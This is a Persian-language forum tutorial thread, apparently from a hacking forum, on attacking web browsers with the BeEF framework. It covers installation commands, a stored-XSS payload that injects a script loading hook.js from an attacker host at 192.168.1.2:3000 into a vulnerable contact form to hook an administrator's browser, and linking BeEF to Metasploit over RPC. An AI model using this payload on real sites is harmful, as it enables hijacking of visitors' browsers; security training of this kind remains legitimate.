SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

هک مرورگر با فریمورک BeEF

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    هک مرورگر با فریمورک BeEF

    BeEF نیز مانند Metasploit ، یک فریمورک برای اجرای حملات است. اما بر خلاف Metasploit ، این ابزار مخصوص حمله به مرورگرهای وب است.

    البته در بعضی موارد ، می توانید از BeEF همراه با Metasploit برای انجام حملات خاص استفاده کنید.

    BeEF توسط گروهی از توسعه دهندگان به سرپرستی Wade Alcorn توسعه داده شد.

    این ابزار بر روی پلت فرم Ruby on Rails بنا نهاده شده است و برای کشف آسیب پذیری در مرورگرها و آزمایش آنها ساخته شده است.

    به طور کلی میتوان گفتBeEF یک بستر عالی برای آزمایش آسیب پذیری مرورگر نسبت به     حملات XSS و سایر حملات تزریق سمت کاربران است.
    برای دیدن سایز بزرگ روی عکس کلیک کنید نام: beef.jpg مشاهده: 805 حجم: 21.7 کیلو بایت



    اجرای beef

    BeEF در کالی لینوکس به صورت پیشفرض موجود است و می تواند به عنوان یک سرویس اجرا شود و از طریق یک مرورگر وب در localhost شما قابل دسترسی باشد.

    در غیر این صورت برنامه را از طریق دستورا زیر نصب نمایید :

    کد:
     [LEFT]
sudo apt-add-repository -y ppa:brightbox/ruby-ng
gem install bundler
sudo apt-get install git
sudo apt-get install curl
curl -sSL https://get.rvm.io | bash -s -- --autolibs=install-packages
sudo .rvm/bin/rvm requirements
curl -sSL https://get.rvm.io | bash -s stable --ruby
rvm install "ruby-2.5.3"
git clone https://github.com/beefproject/beef
cd beef
./install[/LEFT]
    پس از مشاهده پیغام نصب موفق با دستور زیر برنامه را اجرا نمایید :

    کد:
     
 ./beef
    پس از اجرای موفق برنامه از طریق آدرس زیر در مرورگر در دسترس شماست : نام کاربری و رمز عبور برنامه beef می‌باشد ، پس از وارد نمودن آن به صفحه اصلی برنامه هدایت خواهید شد.

    بخش 1
    برچسب ها: هیچ یک
  • #2
    بخش دوم : حملات XSS و ابزار BeEF

    در بخش دوم از آموزش ابزار BeEF حمله به مرورگر کاربران از طریق آسیب پذیری XSS را به شما آموزش خواهیم داد.

    بدین منظور ما باید پیلود برنامه BeEF را به صفحه وب آسیب پذیری اضافه کنیم که قربانی از آن بازدید می‌کند ( یا آدرس آنرا برای کارابر ارسال کنیم) ، روش های بسیاری برای تزریق JavaScript Payload وجود دارد.

    ساده ترین راه این است که پیلود جاوا اسکریپت را در بخش Header وب سایت قرار دهید. پس از مراجعه هدف به وب سایت آلوده شده، مرورگر وب او hook می‌شود.

    اما چگونه ؟

    ساده ترین پیلودی که میتوانیم برای حملات xss استفاده نماییم به شکل زیر است :
    کد:
    <script src= “http://192.168.1.2:3000/hook.js;  type= “text/javascript” ></script>
    * با فرض اینکه وب سایت هدف دارای آسیب پذیری XSS Stored در فرم تماس با ما می‌باشد اسکرییپ فوق را به در بخش آسیب پذیر تزریق و برای مدیر ارسال می‌شود.

    پس از باز کردن صفحه حاوی پلود توسط کاربر مرورگر وی hook شده و در پنل به شکل زیر قابل مشاهده است :
    برای دیدن سایز بزرگ روی عکس کلیک کنید نام: beef-admin.png مشاهده: 605 حجم: 38.1 کیلو بایت



    ادامه دارد

    نظر

    • #3
      بخش سوم : آموزش پیکربندی و اتصال metasploit به BeEF

      ابزار beef این امکان را به نفوذگر می‌دهد تا به metasploit وصل شود ، این قابلیت به وی امکان می‌دهد از ماژول ها و اکسپلویت های تعبیه شده در metasploit برای حمله هرچه بهتر به مرورگر یا افزایش سطح دسترسی استفاده نمیاد.

      در ادامه نحوه اتصال را توضیح خواهیم داد.

      به منظور اتصال ابتدا به فایل زیر در برنامه beef رفته ،
      کد:
       [LEFT]beef/config.yaml.beef.extensions.metasploit[/LEFT]
      و مقدار enable را به true تغییر میدهیم :
      برای دیدن سایز بزرگ روی عکس کلیک کنید نام: beef-meta.JPG مشاهده: 0 حجم: 6.7 کیلو بایت




      حالا باید ماژول پیکربندی ارتباط با متاسپلویت را کانفیگ نماییم ، بدین منظور فایل extensions/metasploit/config.yml را به شکل زیر ویرایش نموده و ذخیره مینماییم :
      برای دیدن سایز بزرگ روی عکس کلیک کنید نام: beef-meta2.JPG مشاهده: 0 حجم: 20.8 کیلو بایت




      نکته : حتما فیلد پسورد را تغییر دهید.

      دسترسی معتبر برنامه beef به سرویس Metasploit RPC امکان مانور بیشتری به شما میدهد ، برای فعال سازی آن می‌توانید دستور زیر را با سویچ r- بر روی msfconsole اجرا نمایید :

      کد:
       [LEFT]load msgrpc ServerHost=127.0.0.1 User=msf Pass=<password> SSL=y[/LEFT]
      ویرایش توسط ground_master : https://www.iranhack.com/forum/member/3609-ground_master در ساعت 01-27-2020, 10:15 AM

      نظر

      قبلی template بعدی
      صبر کنید ..
      X